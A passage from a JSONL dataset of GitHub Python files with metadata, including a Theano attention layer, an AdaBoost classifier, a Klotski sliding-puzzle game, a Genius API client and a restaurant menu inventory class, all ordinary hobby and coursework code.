get_output_for(self, inputs, **kwargs):\n input = inputs[0]\n original_shape = input.shape\n\n mask = None\n if self.mask_incoming_index > 0:\n mask = inputs[self.mask_incoming_index]\n\n # reshape input\n input = input.reshape((input.shape[0] * input.shape[1], input.shape[2]))\n\n # apply mask\n if mask is not None:\n mask = mask.reshape((mask.shape[0] * mask.shape[1], 1))\n input *= mask\n\n # compute g(W* ... g(W* g(W*x+b) +b) ... +b) * v\n activation = input\n for W, b in zip(self.W, self.b):\n activation = T.dot(activation, W) + b.dimshuffle('x', 0)\n activation = self.nonlinearity(activation)\n activation = T.dot(activation, self.v)\n\n # apply softmax - acquiring attention weights for each letter in each tweet\n activation = activation.reshape((original_shape[0], original_shape[1]))\n attention_w = nonlinearities.softmax(activation)\n attention_w = attention_w.reshape((original_shape[0] * original_shape[1], 1))\n\n # get weighted sum of each hidden state according to attention weights\n context = input * attention_w\n context = context.reshape(original_shape)\n context = T.sum(context, axis=1)\n\n return context\n","repo_name":"zylamarek/twitter-sentiment","sub_path":"attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"33273600297","text":"# print pattern\n# A B C D E\n# A B C D\n# A B C\n# A B\n# A\n\ndef pat(n):\n for i in range(n,0,-1):\n for j in range( i, n):\n print(\" \", end=\"\")\n for j in range(0,i):\n print(\" \",chr(j+65) , end=\" \")\n print(\"\")\n\nif __name__ == '__main__':\n n = int(input(\"Enter number : \"))\n pat(n)\n","repo_name":"nikhil03singh/Python-Patterns","sub_path":"51.py","file_name":"51.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"17351918100","text":"# LeetCode \n# Summary Ranges https://leetcode.com/problems/summary-ranges/\n# \n\nclass Solution:\n # @param {integer[]} nums\n # @return {string[]}\n def summaryRanges(self, nums):\n result = []\n n = len(nums)\n start = 0\n end = 0\n\n if n == 0:\n return result\n\n for i in range(1, n):\n if (nums[i] - nums[i - 1] != 1):\n result.append(self._range(start, end, nums))\n start = i\n end = i\n else:\n end += 1\n\n result.append(self._range(start, end, nums))\n\n return result\n\n def _range(self, start, end, nums):\n if start == end:\n return \"{}\".format(nums[start])\n else:\n return \"{}->{}\".format(nums[start], nums[end])\n\n'''\ns = Solution()\nprint s.summaryRanges([0, 1, 2, 4, 5, 7])\nprint s.summaryRanges([0, 1, 2])\n'''\n\n","repo_name":"jeanpan/LeetCode","sub_path":"algorithms/summary_ranges.py","file_name":"summary_ranges.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34089302446","text":"import os\n\nimport psycopg2\n\nfrom src import util\nfrom src.data.articles import article as article_helper\nfrom src.data.articles.boilerpipe import BoilerPipeArticleExtractor\nfrom src.visualization.console import StatusVisualization\n\narticles_base_path = os.environ[\"DATA_PATH\"] + \"/raw/articles/\"\n\nif __name__ == \"__main__\":\n conn = psycopg2.connect(database=\"video_article_retrieval\", user=\"postgres\")\n c = conn.cursor()\n c.execute(\"SELECT source_url FROM articles WHERE text_extraction_status = 'Not Tried'\")\n extractor = BoilerPipeArticleExtractor()\n article_urls = list(c)\n crawling_progress = StatusVisualization(len(article_urls), update_every=100)\n\n for source_url, in article_urls:\n article_path, article_file = article_helper.get_article_html_filepath(source_url)\n html = util.load_gzip_text(os.path.join(article_path, article_file))\n try:\n text = extractor.get_text(html)\n # Save it to the DB\n c.execute(\"UPDATE articles SET text=%s, text_extraction_status=%s WHERE source_url=%s\", [text, \"Success\", source_url])\n conn.commit()\n except Exception as e:\n c.execute(\"UPDATE articles SET text_extraction_status=%s WHERE source_url=%s\", [type(e).__name__, source_url])\n\n\n crawling_progress.inc(by=1)\n","repo_name":"ClaasM/VideoArticleRetrieval","sub_path":"src/data/articles/articles_to_text.py","file_name":"articles_to_text.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"38773458630","text":"import math\n\n\ndef inverse_additif(nombre):\n \"\"\"\n L'inverse additif d'un nombre.\n Trouve la valeur du nombre multiplié par -1.\n\n Args:\n nombre (float): Le nombre à inverser.\n Returns:\n float: L'inverse du nombre.\n\n Exemple:\n ::\n\n >> inverse_additif(45)\n -45\n\n ::\n\n >> inverse_additif(-4.5)\n 4.5\n\n \"\"\"\n\n return -nombre\n\n\ndef inverse_multiplicatif(nombre):\n \"\"\"\n L'inverse multiplicatif.\n Retourne la valeur à la puissance -1.\n\n Args:\n arg1 (float): La valeur dont on veut retourner l'inverse.\n Returns:\n float: L'inverse multiplicaitf de la valeur de départ.\n\n Exemple:\n ::\n\n >> inverse_multiplicatif(5)\n 0.2\n\n ::\n\n >> inverse_multiplicatif(0.25)\n 4\n\n \"\"\"\n\n return 1/nombre\n\n\ndef compteur_entre_borne(debut, fin):\n \"\"\"\n La somme en entre un borne minimale et une borne maximale.\n Ex : `debut + (debut+1) + ... + (fin-1) + fin`.\n Args:\n debut (float): La valeur de départ de la sommation à faire.\n fin (float): La valeur de fin de la sommation à faire.\n Returns:\n float: La somme du compteur entre les bornes données.\n Exemple:\n ::\n\n >> compteur_entre_borne(10, 13)\n 46\n\n ::\n\n >> compteur_entre_borne(0, 7)\n 28\n\n \"\"\"\n\n # Calcule la somme cumulative.\n somme = 0\n for i in range(debut,fin + 1):\n somme = somme + i\n return somme\n\n # NOTE: Une autre réponse sans l'utilisation de la boucle.\n # La légende dit que que l'équation fut trouvé par Carl Friedrich Gauss\n # durant sont enfance.\n # http://bit-player.org/wp-content/extras/gaussfiles/gauss-snippets.html\n # reponse = (fin - debut + 1) * (debut + fin) / 2;\n\n\ndef factoriel(n):\n \"\"\"\n Factoriel de n. Retourne la somme multiplicative de 1 à n.\n\n Args:\n n (float): La valeur pour laquelle on souhaite calculer le factoriel.\n Returns:\n float: La somme multiplicative factoriel du nombre.\n \n Exemple:\n ::\n\n >> factoriel(5)\n 120\n\n \"\"\"\n\n # Trouve la somme cummulative multiplicative de 1 à n.\n fact = 1\n for indice in range(2, n + 1):\n fact = fact * indice\n return fact\n\n\ndef saisit_entre_borne(minimum, maximum):\n \"\"\"\n Saisi une valeur et recommence tant que la saisit n'est pas à\n l'intérieur de bornes données.\n \n Args:\n minimum (float): La borne inférieure de l'intervalle de saisi.\n maximum (float): La borne supérieure de l'intervalle de saisi.\n Returns:\n float: La valeur finalement saisit entre les bornes.\n \n Exemple:\n ::\n \n >> saisit_entre_borne(5, 10)\n Veuillez entrer une valeur : 3\n La valeur doit se situer entre 5 et 10.\n Veuillez entrer une valeur : 12\n La valeur doit se situer entre 5 et 10.\n Veuillez entrer une valeur : 5\n 5\n\n \"\"\"\n\n # Saisit le premier nombre.\n saisit = float(input('Veuillez entrer une valeur : '))\n\n # Tant qu'on dépasse une des bornes.\n while (saisit < minimum or saisit > maximum):\n # Recommence la saisie.\n print('La valeur doit se situer entre', minimum, 'et', maximum)\n saisit = float(input('Veuillez entrer une valeur : '))\n return saisit\n\n\ndef maximum_de_deux(nb1, nb2):\n \"\"\"\n Le nombre maximum entre deux nombres.\n\n Args:\n nb1 (float): Première valeur a comparer.\n nb2 (float): Seconde valeur a comparer.\n Returns:\n float: La valeur maximum entre les deux nombres.\n\n Exemple:\n ::\n\n >> maximum_de_deux(3, 5)\n 5\n\n ::\n\n >> maximum_de_deux(34, 34)\n 34\n\n \"\"\"\n\n # Trouve le plus grand nombre.\n if nb1 > nb2:\n return nb1\n else:\n return nb2\n\n\ndef maximum_de_trois(nb1, nb2, nb3):\n \"\"\"\n Le nombre maximum entre trois nombres.\n\n Args:\n nb1 (float): Première valeur a comparer.\n nb2 (float): Seconde valeur a comparer.\n nb3 (float): Troisième valeur à comparer.\n Returns:\n float: La valeur maximum entre les trois nombres.\n\n Exemple:\n ::\n\n >> maximum_de_trois(3, 5, 2)\n 5\n\n ::\n\n >> maximum_de_trois(34, 34, 34)\n 34\n\n ::\n\n >> maximum_de_trois(34, 5, 34)\n 34\n\n \"\"\"\n\n # Utilise la fonction précédente pour simplifier le problème.\n return maximum_de_deux(maximum_de_deux(nb1,nb2), nb3)\n\n\ndef maximum_de_quatre(nb1, nb2, nb3, nb4):\n \"\"\"\n Le nombre maximum entre quatrew nombres.\n\n Args:\n nb1 (float): Première valeur a comparer.\n nb2 (float): Seconde valeur a comparer.\n nb3 (float): Troisième valeur à comparer.\n nb4 (float): Quatrième valeur à comparer.\n Returns:\n float: La valeur maximum entre les quatre nombres.\n\n Exemple:\n ::\n >> maximum_de_quatre(3, 5, 2, 1)\n 5\n\n ::\n >> maximum_de_quatre(34, 34, 34, 34)\n 34\n\n ::\n >> maximum_de_quatre(34, 5, 34, 45)\n 45\n\n \"\"\"\n\n # Utilise la fonction précédente pour simplifier le problème.\n return maximum_de_deux(maximum_de_deux(nb1, nb2), maximum_de_deux(nb3, nb4))\n\n\ndef pgcd(a, b):\n \"\"\"\n Le plus grand commun diviseur entre deux nombre. Utilise\n l'algorithme suivant pour y arriver:\n\n ::\n\n tant que b diférent de 0\n si a plus grand que b alors\n a := a - b\n sinon\n b := b - a\n fin si\n fin tant que\n résultat := a\n\n Le signe `:=` est une assignation en algorithmie.\n\n Args:\n a (float): Première valeur.\n b (float): Deuxième valeur.\n Returns:\n float: Plus grand diviseur des deux nombres.\n\n Exemple:\n ::\n\n >> pgcd(12, 30)\n 6\n\n ::\n\n >> pgcd(8, 4)\n 4\n\n \"\"\"\n\n # Utilise l'algorithme fourni pour trouver les plus grand diviseur.\n while b != 0:\n if a > b:\n a = a - b\n else:\n b = b - a\n\n return a\n\n\ndef est_premier(n):\n \"\"\"\n Détermine si le nombre est premier.\n Retourne `true` si le nombre est premier, `false` autrement.\n \n Args:\n n (float): Le nombre à tester.\n Returns:\n float: `true` si le nombre est premier.\n \n Exemple:\n ::\n \n >> est_premier(4)\n False\n \n ::\n \n >> est_premier(7)\n True\n\n \"\"\"\n\n # Test des cas particuliers.\n if (n == 2):\n premier = True\n elif (n == 1 or n % 2 == 0):\n premier = False\n else:\n # Suppose que le nombre est premier.\n premier = True\n\n # Vérifie tous les diviseurs impairs entre 2 et sqrt(n).\n # Note : une propriété mathématique nous permet de tester jusqu'à\n # sqrt(n) pour augmenté la rapidité de la fonction.\n racineN = math.sqrt(n)\n indice = 3\n while indice <= racineN and premier == True:\n # Si on trouve un diviseur, alors il n'est pas premier.\n if n % indice == 0:\n premier = False\n #Saut de 2 pour sauter le prochain nombre pair.\n indice = indice + 2\n\n return premier\n\n\ndef affiche_n_nombre_premier(n):\n \"\"\"\n Affiche les n nombres premiers dans la fenêtre de commande.\n\n Args:\n n (float): Le nombre de nombre premiers à afficher.\n\n Exemple:\n ::\n\n >> affiche_n_nombre_premier(4)\n 1 ieme nombre premier : 2.\n 2 ieme nombre premier : 3.\n 3 ieme nombre premier : 5.\n 4 ieme nombre premier : 7.\n\n \"\"\"\n\n # Compte le nombre généré.\n nAffiche = 0\n i = 1\n while nAffiche < n:\n # Trouve si le prochain indice est premier.\n if est_premier(i):\n # Affiche et garde compte du nombre afficher.\n nAffiche = nAffiche + 1\n print(nAffiche, 'ieme nombre premier : ', i)\n i = i + 1\n\n\ndef n_diviseur(n):\n \"\"\"\n Le nombre de diviseurs de n.\n\n Args:\n n (float): Le nombre à tester.\n Returns:\n float: Le nombre de diviseurs du nombre.\n\n Exemple:\n ::\n\n >> n_diviseur(45)\n 6\n\n ::\n\n >> n_diviseur(8)\n 4\n\n \"\"\"\n\n # Teste tous les diviseurs possibles.\n # Inclus 1 automatique pour augmenter l'efficaciter de la fonction.\n diviseurs = 1\n indice = 2\n while (indice <= n):\n if n % indice == 0:\n diviseurs = diviseurs + 1\n indice = indice + 1\n return diviseurs\n\n # Note : On pourrait résoudre le problème grâce à la fonction Phi\n # d'Euler qui dit que le nombre de diviseurs d'un nombre\n # est égal au produit des exposants + 1 de sa représentation\n # en nombre premiers.\n # Ex. : 200 = 2^3 * 5^2\n # Phi(200) == 4 * 3 == 12 == nDiviseurs\n\n","repo_name":"dullin/hololink-site","sub_path":"content/INF1035/laboratoires/labo3/labo3.py","file_name":"labo3.py","file_ext":"py","file_size_in_byte":9061,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"37079560157","text":"import json\nfrom datetime import datetime, timedelta\n\nimport redis\nimport requests\n\nfrom confitec.ext.database import Artists, resource\n\ncache = redis.Redis(host=\"redishost\", port=6379, decode_responses=True)\n\n\nclass GeniusAPI:\n def __init__(self, headers):\n self.headers = headers\n self.BASE_API = \"https://api.genius.com/search\"\n\n def get_songs(self, artist_name, in_cache=True):\n artists = Artists(resource)\n expiration_time = 7 * 86400 \n\n if in_cache:\n songs = cache.get(artist_name.replace(\" \", \"-\"))\n if songs == None:\n response = requests.get(\n f\"{self.BASE_API}\",\n params={\"q\": artist_name},\n headers=self.headers,\n ).json()\n\n cache.set(\n artist_name.replace(\" \", \"-\"), json.dumps(response[\"response\"])\n )\n cache.expire(artist_name.replace(\" \", \"-\"), expiration_time)\n\n return response[\"response\"]\n return json.loads(songs)\n\n response = requests.get(\n f\"{self.BASE_API}\",\n params={\"q\": artist_name},\n headers=self.headers,\n ).json()\n\n if response[\"meta\"][\"status\"] == 200:\n if not artists.find_one(artist_name):\n artists.save(artist_name)\n cache.set(\n artist_name.replace(\" \", \"-\"), json.dumps(response[\"response\"])\n )\n cache.expire(artist_name.replace(\" \", \"-\"), expiration_time)\n\n return response[\"response\"]\n","repo_name":"carmo-sousa/Confitec","sub_path":"confitec/services/genius.py","file_name":"genius.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"4049512926","text":"\nclass Solution:\n\n def isValidParenthesis(self, parentheses):\n\n stack = []\n for paren in parentheses:\n if stack == [] and paren == \")\":\n return False\n\n if paren == \"(\":\n stack.append(\"(\")\n else:\n stack.pop()\n\n return stack == []\n\n def generateParentheses(self, n):\n DP = [[\"(\"]]\n\n # Why n*2? -> if n = 3, there will be n*2=6 total parentesis in a valid combination. Ex. ((())), ()()()\n # Why n-1? -> The first parent \"(\" is already added in DP. So if n = 3, we only need to add 5 more parentesis. Ex. ( -> ()()(), ( -> ((()))\n parenthesesToAdd = n * 2 - 1\n\n for i in range(parenthesesToAdd):\n DP.append([])\n for paren in [\"(\", \")\"]:\n for combination in DP[i]:\n DP[i+1].append(combination + paren)\n\n validParenthesis = []\n for combination in DP[-1]:\n if not self.isValidParenthesis(combination):\n continue\n\n validParenthesis.append(combination)\n\n return validParenthesis\n\n\nsolution = Solution().generateParentheses(3)\n\nprint(solution)\n","repo_name":"kevin-a-nelson/leetcodePath","sub_path":"GenerateParentheses/GenerateParentheses.py","file_name":"GenerateParentheses.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21916640790","text":"from pathlib import Path\n\nimport pytest\n\nfrom PIL import Image\n\nfrom ksvd import utils\n\n\n@pytest.fixture\ndef image_path(tmp_path) -> str:\n \"\"\"\n Crate random image and return path to it.\n \"\"\"\n image = Image.new(\"RGB\", (112, 112))\n path = tmp_path / \"test.png\"\n image.save(path)\n return str(path)\n\n\ndef test_load_patches(image_path: str) -> None:\n \"\"\"\n Test load_image function.\n \"\"\"\n image = utils.load_image(image_path, rgb=False)\n assert image.shape == (112, 112)\n\n patches = utils.image_to_patches(image, 8)\n assert patches.shape == (196, 64)\n\n\ndef test_load_dataset_from_dir(image_path: str) -> None:\n \"\"\"\n Test load_dataset_from_dir function.\n \"\"\"\n folder = Path(image_path).parent\n dataset = utils.load_dataset_from_dir(folder, 8)\n assert dataset.shape == (196, 64)\n","repo_name":"guyshapira-academic/K-SVD","sub_path":"tests/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25894150196","text":"# -*- coding: utf-8 -*-\n\"\"\"Module docstring.\n\nauthor: ferris\nupdate: 2015-11-21\nfunction: Adaboost判别模型, 基于ml_decision_trees.py中CART算法\n\n\"\"\"\n\nimport numpy as np\nimport ml_decision_tree as dts\n\n\nclass AdaBoost:\n def __init__(self, rows):\n self.rows = rows\n self.y = [r[len(rows[0]) - 1] for r in rows] # 样本y标签\n self.trees = []\n self.m = len(rows) # 样本容量\n self.alpha = None\n\n def train(self, k=50, th=0.0, d=2):\n \"\"\"\n 循环训练, 得到self.trees和self.alpha\n :param k: 循环次数\n :param th: 阈值传递给dts.train_cart\n :param d: 树的深度, 传递给dts.train_cart\n :return:\n \"\"\"\n self.alpha = np.repeat([0], k) # 初始化树权重\n weight = np.repeat([1 / self.m], self.m) # 初始化样本权重\n\n for i in range(k):\n\n # 首次训练\n # bootstrap抽样\n sample_indices = np.random.choice(range(self.m), size=self.m, replace=True, p=weight)\n sampled = [self.rows[i] for i in sample_indices]\n tree = dts.train_cart(sampled, th=th, d=d, sample=False)\n predicted = dts.predict(tree, self.rows, out=\"value\") # 预测原样本\n err_vec = np.where(np.array(self.y) != np.array(predicted), 1, 0)\n err_rate = (1 / self.m) * err_vec.dot(weight) # 错误率\n\n # 错误率超过0.5, 重新训练\n while err_rate > 0.5:\n weight = np.repeat([1 / self.m], self.m) # 重置权重\n # bootstrap抽样\n sample_indices = np.random.choice(range(self.m), size=self.m, replace=True, p=weight)\n sampled = [self.rows[i] for i in sample_indices]\n tree = dts.train_cart(sampled, th=th, d=d, sample=False)\n predicted = dts.predict(tree, self.rows, out=\"value\") # 预测原样本\n err_vec = np.where(np.array(self.y) != np.array(predicted), 1, 0)\n err_rate = (1 / self.m) * err_vec.dot(weight) # 错误率\n\n self.alpha[i] = 0.5 * np.log((1 - err_rate) / err_rate) # 更新树权重\n weight *= np.exp(self.alpha[i] * err_vec) # 更新样本权重\n weight /= np.sum(weight) # 归一化样本权重\n self.trees.append(tree) # 树入栈\n\n def predict(self, rows_new):\n \"\"\"\n 对self.trees的每个预测结果, 按照self.alpha累加权重, 返回权重最高的y标签\n :param rows_new: 待预测数据\n :return: adaboost预测y标签\n \"\"\"\n results = []\n for r in rows_new:\n y_dic = {} # key: 预测y标签; value: 树权重\n for i in range(len(self.trees)):\n t = self.trees[i]\n p = dts.predict_single(t, r, out=\"value\")\n y_dic[p] = y_dic.get(p, 0) + self.alpha[i] # 累加每个y标签值的权重\n weighed_p = dts.topkey(y_dic)\n results.append(weighed_p)\n return results\n\n def test(self, rows_test):\n \"\"\"\n :param rows_test: 待测试数据\n :return: 错误率\n \"\"\"\n l = len(rows_test[0]) - 1\n predicted = self.predict(rows_test)\n actual = [r[l] for r in rows_test]\n err = sum(np.array(predicted) != np.array(actual))\n err_rate = float(err) / len(rows_test)\n print(\"error rate: {0}\".format(str(err_rate)))\n return err_rate\n\n\n# ad = AdaBoost(dts.my_data)\n# ad.train(k=30)\n# ad.predict(dts.my_data)\n# ad.test(dts.my_data)\n","repo_name":"ferris-wufei/algorithm_ml","sub_path":"ml_Adaboost.py","file_name":"ml_Adaboost.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"6191333964","text":"import random\r\n\r\nprint(\"\"\"Welcome to zzy's game! The board has an empty space where \r\nan adjacent tile can be slid to.The objective of the game \r\nis to rearrange the tiles into a sequential order by their\r\nnumbers (left to right, top to bottom) by repeatedly making\r\nsliding moves (left, right, up or down).\"\"\")\r\n# Ask the player to enter the nth puzzle which he or her want to learn.\r\nwhile True:\r\n g_dimension = input('enter the dimension you want to play(3-10)>')\r\n if g_dimension.isdigit() and (2 < int(g_dimension) < 11): # check whether it is a correct number\r\n g_dimension = int(g_dimension)\r\n break\r\n else:\r\n print('Invaild input! Please check your input.')\r\n# Allow the player to define the letter to control the move\r\nwhile True:\r\n g_define = input(\r\n 'Enter the four letters used for left, right, up and down directions>')\r\n g_define = list(g_define.split()) # split the letter\r\n # make a new list to check if there exist repeat number\r\n g_define_lst = set(g_define)\r\n if ((len(g_define_lst) == len(g_define)) and len(g_define) == 4\r\n and all([word in [chr(i) for i in range(97, 123)] for word in g_define])): # check whether the input is lowcase letters\r\n break\r\n else:\r\n print('Invaild input! Please check your input.')\r\n# define the direction order\r\ng_right = g_define[1]\r\ng_left = g_define[0]\r\ng_up = g_define[2]\r\ng_down = g_define[3]\r\ng_times = 0 # Create a variable to track the times that player try.\r\n# Make a empty list in order to put numbers and space in a random order.\r\ng_numbers = []\r\n# Make a empty list in order to put numbers and space in the correct order.\r\ng_numbers_sorted = []\r\n# put the numbers in two lists in correct order.\r\nfor g_number in range(1, g_dimension**2):\r\n g_numbers.append(g_number)\r\n g_numbers_sorted.append(g_number)\r\n# put the space in two list\r\ng_numbers.append(' ')\r\ng_numbers_sorted.append(' ')\r\n\r\n\r\ndef create_random_rumber(): # mess up the order of first list of number\r\n while True:\r\n random.shuffle(g_numbers)\r\n position = g_numbers.index(' ')\r\n if g_dimension % 2 == 1 and get_inversion_number() % 2 == 0 \\\r\n and g_numbers != g_numbers_sorted:\r\n output_number() # if the dimension is odd, the inversion number must be even\r\n break\r\n elif (g_dimension % 2 == 0 and (position//g_dimension +\r\n get_inversion_number()) % 2 == 1 and g_numbers != g_numbers_sorted):\r\n output_number() # if the dimension is even, deviation of the dimension and the space line,inversion number must be even or odd together\r\n break\r\n\r\n\r\ndef get_inversion_number(): # figure out the inversion number of the ramdom list\r\n inversion_number = 0\r\n position = g_numbers.index(' ')\r\n del g_numbers[position]\r\n # figure out the inversion number\r\n for i in range(0, (g_dimension**2-2)):\r\n for m in range(i+1, g_dimension**2-1):\r\n if g_numbers[i] > g_numbers[m]:\r\n inversion_number += 1\r\n g_numbers.insert(position, ' ')\r\n return inversion_number\r\n\r\n\r\ndef output_number(): # print out the number and space in the right formula\r\n for n in range(1, g_dimension+1):\r\n line_n = g_numbers[(n-1)*g_dimension: n*g_dimension]\r\n for i in range(0, g_dimension): # print the number line by line\r\n # if the number<10 or a space, print two space in order to align\r\n if line_n[i] == ' ' or int(line_n[i]) < 10:\r\n print(line_n[i], end=(' '*2))\r\n else:\r\n # for the number biger than 10, print with one space\r\n print(line_n[i], end=(' '))\r\n print('') # lastly print a empty thing to make a new line.\r\n\r\n\r\ndef input_order(): # allow the player to enter the direction to move\r\n while True:\r\n # find the position which the space lie in, and make a list of vaild order\r\n position = g_numbers.index(' ')\r\n order_list = ['Enter your move(', 'left-', g_left, ', right-',\r\n g_right, ', up-', g_up, ', down-', g_down, ')>']\r\n # delete the invalid order\r\n if -1 < position < g_dimension:\r\n order_list.remove(', down-')\r\n order_list.remove(g_down)\r\n if position % g_dimension == 0:\r\n order_list.remove(', right-')\r\n order_list.remove(g_right)\r\n if (position+1) % g_dimension == 0:\r\n order_list.remove('left-')\r\n order_list.remove(g_left)\r\n if ((g_dimension-1)*g_dimension) <= position <= g_dimension**2:\r\n order_list.remove(', up-')\r\n order_list.remove(g_up)\r\n if (position+1) % g_dimension != 0: # if the left order is vaild, just print the list\r\n for order_l in order_list:\r\n print(order_l, end='')\r\n else: # if the left order is invaild, we need to delete ', ' from the first vaild order\r\n order_list[1] = order_list[1][2:]\r\n for order_l in order_list:\r\n print(order_l, end='')\r\n order = input() # allow player to enter the order\r\n # create a list to restore the vaild order to make sure that player put the right order\r\n correct_input = []\r\n for x in range(1, len(order_list)):\r\n if x % 2 == 0:\r\n correct_input.append(order_list[x]) # restore the vaild order\r\n if order not in correct_input: # if the player enter a invaild order, remind him or her\r\n print('Invaild input! Please check your input.')\r\n continue\r\n return order\r\n\r\n\r\ndef move(): # follow the player's order to make a move.\r\n order = input_order()\r\n # find the position of space before this move\r\n position = g_numbers.index(' ')\r\n # exchange the position of space and surrounding number\r\n if order == g_left:\r\n g_numbers[position], g_numbers[position + 1] = \\\r\n g_numbers[position+1], g_numbers[position]\r\n elif order == g_right:\r\n g_numbers[position-1], g_numbers[position] = \\\r\n g_numbers[position], g_numbers[position-1]\r\n elif order == g_up:\r\n g_numbers[position], g_numbers[position + g_dimension] = \\\r\n g_numbers[position+g_dimension], g_numbers[position]\r\n elif order == g_down:\r\n g_numbers[position-g_dimension], g_numbers[position] = \\\r\n g_numbers[position], g_numbers[position-g_dimension]\r\n output_number() # print the list of numeber in correct order\r\n\r\n\r\ndef contine_the_game(): # the main proccess of the game\r\n create_random_rumber() # create a solvable number list\r\n while True:\r\n global g_times\r\n # if the player solve the puzzle ssuccessfully, end the loop\r\n if g_numbers == g_numbers_sorted and g_times != 1:\r\n print('Congratulations! You solve the puzzle in ' +\r\n str(g_times) + ' moves.')\r\n break\r\n elif g_numbers == g_numbers_sorted and g_times == 1:\r\n print('Congratulations! You solve the puzzle in ' +\r\n str(g_times) + ' move.')\r\n break\r\n # if the puzzle cannot be solved yet, track the times players use and continue\r\n else:\r\n move()\r\n g_times += 1\r\n\r\n\r\ncontine_the_game() # begin the game\r\n\r\nwhile True: # if the player finish the game, ask the player whether want to player again.\r\n q_or_n = input(\r\n 'Enter ‘n’ to start a new game or enter ‘q’ to end the game >')\r\n if q_or_n == 'n':\r\n g_times = 0 # restart g_times\r\n contine_the_game()\r\n elif q_or_n == 'q': # withdraw from the program\r\n exit()\r\n else: # if player enter something else, give him or her a reminder.\r\n print('Invaild input! Please check your input.')\r\n","repo_name":"cragramer/Klotski","sub_path":"Klotski_Source.py","file_name":"Klotski_Source.py","file_ext":"py","file_size_in_byte":7829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40305962382","text":"from src.item import MenuItem, MainMenuItem, MeasuredMenuItem, BaseMenuItem, MainOrderItem\nimport pickle\nfrom src.item import OrderException\n\n#class to represent the Menu and Inventory\nclass Menu:\n\tdef __init__(self):\n\t\tself._items = {}\n\t\n\t#functions to add items to the menu\t\n\tdef add_main(self, name, price, stock_quantity, food_type, ingredients):\n\t\tself._items[name] = MainMenuItem(name, price, stock_quantity, food_type, ingredients)\t\n\n\tdef add_measured_item(self, name, price, stock_quantity, food_type, serving_size, base_item):\n\t\tself._items[name] = MeasuredMenuItem(name, price, stock_quantity, food_type, serving_size, base_item)\t \n \n\tdef add_menu_item(self, name, price, stock_quantity, food_type, main, ing_type):\n\t\tself._items[name] = MenuItem(name, price, stock_quantity, food_type, main, ing_type) \n \n\tdef add_base_item(self, name, price, stock_quantity, food_type, related_items):\n\t\tself._items[name] = BaseMenuItem(name, price, stock_quantity, food_type, related_items)\n \n #function to set the quantity of measured items from base items\t e.g. set quantity of \"small nuggets\", \"medium nuggets\" and \"large nuggets\" from \"nuggets\". base_item is a str\n\tdef set_quantity(self, base_item):\n\t\t#not an item on the menu\n\t\tif not base_item in self._items:\n\t\t\treturn False\t\n\t\t#not a BaseMenuIte\t\n\t\tif not isinstance(self._items[base_item], BaseMenuItem):\n\t\t\treturn False\n\t\trelated_items = self._items[base_item].related_items\t\n\t\ttotal_quantity = self._items[base_item].stock_quantity\t\n\t\tfor item in related_items:\n\t\t\tserving_size = self._items[item].serving_size\n\t\t\tnew_quantity = total_quantity / serving_size\n\t\t\t#if new quantity is < 1, new quantity = 0\n\t\t\tif new_quantity < 1:\n\t\t\t\tnew_quantity = 0\n\t\t\tself._items[item].stock_quantity = new_quantity\n\t\treturn True \n\n\t#function to decrement stock quantity after an order is placed. items is a list of strings and MainOrderItems\n\tdef dec_inventory(self, items):\n\t\tfor item in items:\n\t\t\tif isinstance(item, MainOrderItem):\n\t\t\t\tingredients = item.ingredients\n\t\t\t\tfor key, value in ingredients.items():\n\t\t\t\t\tcount = value\n\t\t\t\t\tself._items[key].stock_quantity -= count\n\t\t\telif isinstance(item, MeasuredMenuItem):\n\t\t\t\tbase_item_name = self._items[item.name].base_item\n\t\t\t\tbase_item = self._items[base_item_name]\n\t\t\t\tserving_size = self._items[item.name].serving_size\n\t\t\t\tself._items[base_item.name].stock_quantity -= serving_size\n\t\t\t\tself.set_quantity(base_item)\n\t\t\telif isinstance(item, MenuItem):\n\t\t\t\tself._items[item.name].stock_quantity -= 1\n\n\t\tself.save_inventory()\t\t\n\t\treturn\t\n\n\t#function to check whether we have enough stock to fulfil an order. items is a list of MeasuredItems and MainOrderItems\n\t# returns a dictionary of items that are insufficient to complete order\n\t# [item.name] = stock levels\n\tdef check_enough_inventory(self, items):\n\t\tinsufficient = {}\n\t\ttotal = {}\n\t\tfor item in items:\n\t\t\tif isinstance(item, MainOrderItem):\n\t\t\t\tingredients = item.ingredients\n\t\t\t\tfor key, value in ingredients.items():\n\t\t\t\t\tif key not in total.keys():\n\t\t\t\t\t\ttotal[key] = value\n\t\t\t\t\telse:\n\t\t\t\t\t\ttotal[key] += value\n\t\t\telse:\n\t\t\t\tif item.name not in total.keys():\n\t\t\t\t\ttotal[item.name] = items.count(item)\n\t\t# print(total)\n\t\tfor key, value in total.items():\n\t\t\tif not key in self._items:\n\t\t\t\traise OrderException(\"{0} is not a valid ingredient\".format(key))\n\t\t\tif value > self._items[key].stock_quantity:\n\t\t\t\tinsufficient[key] = self._items[key].stock_quantity\n\t\treturn insufficient\n\n\t#function to set the quantity of base wrap and base burger based on the least available ingredient\n\tdef set_main_quantity(self, main_item):\n\t\tingredients = self.get_item(main_item).ingredients\n\t\tquantity = self.get_stock_quantity(ingredients[0])\n\t\tfor ingredient in ingredients:\n\t\t\tcount = ingredients.count(ingredient)\n\t\t\tif 